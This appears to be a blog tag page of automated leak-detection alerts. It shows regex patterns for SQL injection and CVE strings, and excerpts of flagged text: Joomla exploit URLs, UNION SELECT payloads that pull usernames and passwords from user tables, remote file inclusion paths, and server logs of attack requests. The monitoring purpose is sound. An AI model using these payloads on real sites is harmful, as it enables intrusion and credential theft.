Posts Tagged ‘SQL Injection’
Potential leak of data: SQL Injection
Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
Potential leak of data: SQL Injection
Detected 4 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
############################################################################### # # # index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* # # #
Potential leak of data: CVE Reference
Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:
Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
Potential leak of data: SQL Injection
Detected 2 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
.44 - - [18/Jun/2012:17:36:20 -0700] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0"
188.72.213.44 - - [18/Jun/2012:17:36:21 -0700] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0"
188.72.213.44 - - [18/Jun/2012:17:36:21 -0700] "GET /wp-trackback.php?p=1 HTTP/1.1" 404 135 "-" "Mozilla/4.0"
188.72.21
Potential leak of data: Remote File Inclusion
Detected 2 occurrence(s) of ‘remote file inclusion’:
gin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.
Vulnerable? No sad
# 37
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No
# 38
Info -> Component: Joomla com_quran SQL Injection
Detected 2 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
xploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Vulnerable? No
# 24
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No
# 25
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Chec

